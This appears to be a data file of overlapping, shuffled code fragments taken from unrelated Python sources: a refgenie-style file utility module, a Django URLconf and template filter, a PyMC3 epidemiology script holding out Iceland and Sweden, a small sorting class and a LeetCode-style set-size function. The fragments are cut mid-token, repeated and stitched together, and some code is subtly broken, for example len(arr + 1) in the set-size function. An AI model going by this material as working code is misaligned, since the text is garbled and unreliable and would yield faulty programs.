"os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir)",
":return bool: decision -- whether to skip the file lock for read \"\"\"",
"-- whether to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg)) if",
"pre-existence. \"\"\" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise",
"def _raise_missing_recipe_error(recipe): \"\"\" Raise an error for a missing recipe, when one is",
"def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not forced, check",
"directories in a path if it does not exist. :param str path: Path",
") def _skip_lock(skip_arg, cfg): \"\"\" If config read lock skip was not forced,",
"input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict:",
"f\"Recipe '{recipe}' not found. Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg):",
"str cfg: path to the confjg :return bool: decision -- whether to skip",
":param Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt, test=txt],",
"Path to create. :raises Exception: if the path creation attempt hits an error",
"dir is writable and set the default to the result :param bool skip_arg:",
"os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return",
"refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions",
"_single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an",
"Available recipes: \" f\"{', '.join(list(asset_build_packages.keys()))}\" ) def _skip_lock(skip_arg, cfg): \"\"\" If config read",
":raises Exception: if the path creation attempt hits an error with a code",
"ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input):",
"if \"=\" in x} if lst is not None else lst ) def",
"create. :raises Exception: if the path creation attempt hits an error with a",
":raise MissingRecipeError: always \"\"\" raise MissingRecipeError( f\"Recipe '{recipe}' not found. Available recipes: \"",
"elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): \"\"\" Raise an error",
"decision -- whether to skip the file lock for read \"\"\" return is_writable(os.path.dirname(cfg))",
"build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command",
"for i in input or []: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x",
"a code indicating a cause other than pre-existence. \"\"\" try: os.makedirs(path) except OSError",
"def _writeable(outdir, strict_exists=False): outdir = outdir or \".\" if os.path.exists(outdir): return _single_folder_writeable(outdir) elif",
"from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user",
"if lst is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK)",
"else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir,",
"read \"\"\" return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): \"\"\" Creates",
"\"\"\" Creates all directories in a path if it does not exist. :param",
"asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse user input specification. Used",
"os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages",
"was not forced, check if dir is writable and set the default to",
"from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def",
"( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in x} if lst",
"check if dir is writable and set the default to the result :param",
"is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): \"\"\" Parse",
"[]: lst.extend(i) return ( {x.split(\"=\")[0]: x.split(\"=\")[1] for x in lst if \"=\" in",
"to the result :param bool skip_arg: argument selected on the CLI :param str",
"values \"\"\" lst = [] for i in input or []: lst.extend(i) return",
"a path if it does not exist. :param str path: Path to create.",
"from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from",
"for x in lst if \"=\" in x} if lst is not None"
] |
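The row above shingles a refgenie-style utility module. The following is a minimal, stdlib-only sketch of two of the helpers the fragments reconstruct; the `refgenconf` / `ubiquerg` imports and the lock/writeability helpers of the original are omitted, so this illustrates the flattening and path-creation logic rather than the module itself.

```python
import errno
import os

def make_sure_path_exists(path):
    """Create all directories in a path; re-raise anything but pre-existence."""
    try:
        os.makedirs(path)
    except OSError as exception:
        if exception.errno != errno.EEXIST:
            raise

def _parse_user_build_input(input):
    """Flatten [[fasta=txt, test=txt], ...] CLI input into a key/value dict."""
    lst = []
    for i in input or []:
        lst.extend(i)
    # Note: lst is always a list here, so the `if lst is not None` guard in
    # the fragments is redundant; it is kept for fidelity to the source.
    return (
        {x.split("=")[0]: x.split("=")[1] for x in lst if "=" in x}
        if lst is not None
        else lst
    )

print(_parse_user_build_input([["fasta=hg38.fa"], ["test=1"]]))
# -> {'fasta': 'hg38.fa', 'test': '1'}
```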
[] |
[
"django.conf.urls import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name':",
"import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}),",
"patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$',",
"url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$', 'django.contrib.auth.views.logout'), )",
"include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$', 'django.contrib.auth.views.logout'),",
"from django.conf.urls import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login',"
] |
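This short row is an old-style Django URLconf: `patterns()` and string view references were deprecated in Django 1.8 and removed in 1.10. A modern equivalent, assuming the same `demo` app and Nuit login template exist in the project, would look roughly like this:

```python
from django.contrib.auth import views as auth_views
from django.urls import include, path

urlpatterns = [
    path('', include('demo.urls')),
    path('login/', auth_views.LoginView.as_view(
        template_name='nuit/generic/login.html')),
    path('logout/', auth_views.LogoutView.as_view()),
]
```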
[
"cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs",
"bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type)",
"= '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras =",
"{**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model:",
"os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras",
"and sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor",
"preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] =",
"from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import",
"epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils",
"Holdout both iceland and sweden \"\"\" import pymc3 as pm from epimodel import",
"target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape",
"model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500,",
"= {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with",
"argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data",
"model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14,",
"last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class",
"extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5)",
"pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1'",
"'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd",
"model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains,",
"\"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data",
"\"\"\" :code:`iceswe.py` Holdout both iceland and sweden \"\"\" import pymc3 as pm from",
"__name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if",
"ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data)",
"model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) *",
"os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser()",
"nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales)",
"os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ ==",
"generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) +",
"'1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__",
"'1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args()",
"import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] =",
"pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace =",
"if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type)",
"os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser)",
"= get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag')",
"model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag,",
"= '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if",
"pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse",
"save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace =",
"both iceland and sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters",
"= EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as",
"= get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta",
"import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser =",
"args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction)",
"parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS,",
"with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples,",
"preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters()",
"epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os",
":code:`iceswe.py` Holdout both iceland and sweden \"\"\" import pymc3 as pm from epimodel",
"= argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data =",
"data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)}",
"chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS,",
"full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag, generate_base_output_dir(args.model_type,",
"get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta =",
"= pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))",
"as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains,",
"= np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))",
"tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects:",
"as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import",
"scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] =",
"add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30')",
"argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(),",
"data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with",
"from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS']",
"pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if",
"= '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__':",
"= preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep =",
"model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type,",
"argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE')",
"max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs =",
"EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model:",
"data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep",
"ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta,",
"import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1'",
"data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd)",
"import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS']",
"sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import",
"pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle",
"with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction,",
"init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace",
"model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag,",
"argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS']",
"= argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS')",
"from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from",
"'__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in",
"import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import",
"model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd)",
"= model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace,",
"args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type:",
"== '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only'",
"if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings()",
"data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class =",
"nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt',",
"get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt',",
"'1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args,",
"iceland and sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from",
"if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs))",
"in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd =",
"**parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace",
"import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import",
"import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1'",
"EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import *",
"args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(),",
"* import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser",
"model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp("
] |
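The row above shingles `iceswe.py`, a sensitivity-analysis run that holds out Iceland and Sweden, builds an epimodel PyMC3 model, samples it, and saves the `CMReduction` trace. The project-specific helpers (`epimodel`, `scripts.sensitivity_analysis.utils`) cannot be reproduced here; the one self-contained step is the country-specific-effects transform, sketched below with dummy numpy arrays standing in for `model.trace.CMReduction` and `model.trace.CMAlphaScales` (whose broadcast shape is an assumption).

```python
import numpy as np

nS, nCMs = 1000, 9                        # posterior samples x interventions
cm_reduction = np.random.uniform(0.5, 1.0, size=(nS, nCMs))   # stand-in trace
cm_alpha_scales = np.full((nS, 1), 0.1)   # assumed per-sample noise scale

# Per-country effects: jitter the shared reduction in log space.
full_trace = np.exp(
    np.log(cm_reduction) + np.random.normal(size=(nS, nCMs)) * cm_alpha_scales
)
print(full_trace.shape)  # (1000, 9)
```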
[
"from django import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not",
"<reponame>Netromnik/python from django import template register = template.Library() @register.filter('modF') def modF(value, arg): print",
"template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return",
"template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not (int( value)%int(arg))",
"register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not",
"django import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int(",
"= template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not (int(",
"import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg)))"
] |
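The row above is a small custom Django template filter. Reassembled, `modF` returns whether `value` is evenly divisible by `arg`; this sketch drops the stray debug `print` from the fragment but keeps the registration unchanged.

```python
from django import template

register = template.Library()

@register.filter('modF')
def modF(value, arg):
    """True when value divides evenly by arg, e.g. {{ forloop.counter|modF:3 }}."""
    return not (int(value) % int(arg))
```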
[
"range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y],",
"list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x]",
"def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] >",
"y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2])",
"range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 =",
"class Small_Number: def __init__(self, list): self.list = list def sma(self): for x in",
"= list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if",
"self.list = list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)):",
"<filename>small_number.py class Small_Number: def __init__(self, list): self.list = list def sma(self): for x",
"in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1",
"if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 = Small_Number([1,2,-8,-2,0,-2])",
"in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] =",
"__init__(self, list): self.list = list def sma(self): for x in range(len(self.list)): for y",
"list): self.list = list def sma(self): for x in range(len(self.list)): for y in",
"for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x],",
"for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x]",
"Small_Number: def __init__(self, list): self.list = list def sma(self): for x in range(len(self.list)):",
"self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 = Small_Number([1,2,-8,-2,0,-2]) s1.sma()",
"def __init__(self, list): self.list = list def sma(self): for x in range(len(self.list)): for",
"sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]:",
"x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y]"
] |
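The class shingled above finds the second-smallest element the hard way: the double loop with a pairwise swap on `>` is the classic "this simple loop sorts" exchange sort (descending here), after which index `-2` is the second smallest. An equivalent, clearer version of the same idea (class and method names are mine):

```python
class SmallNumber:
    def __init__(self, values):
        self.values = list(values)

    def second_smallest(self):
        # Sorted ascending, index 1 is the second smallest; ties count,
        # matching the original's behaviour on duplicates.
        return sorted(self.values)[1]

s1 = SmallNumber([1, 2, -8, -2, 0, -2])
print(s1.second_smallest())  # -2, same as the fragment's print(self.list[-2])
```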
[
"min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num in",
"reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) / 2 else:",
"Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0,",
"num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num])",
"cut = len(arr) / 2 else: cut = len(arr + 1) / 2",
"if len(arr) % 2 == 0: cut = len(arr) / 2 else: cut",
"= len(arr + 1) / 2 for count in counts: min_size += 1",
"else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if",
"{}, [], 0, len(arr) for num in arr: if num in num_to_count: num_to_count[num]",
"= 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) %",
"1) / 2 for count in counts: min_size += 1 current_length -= count",
"counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr)",
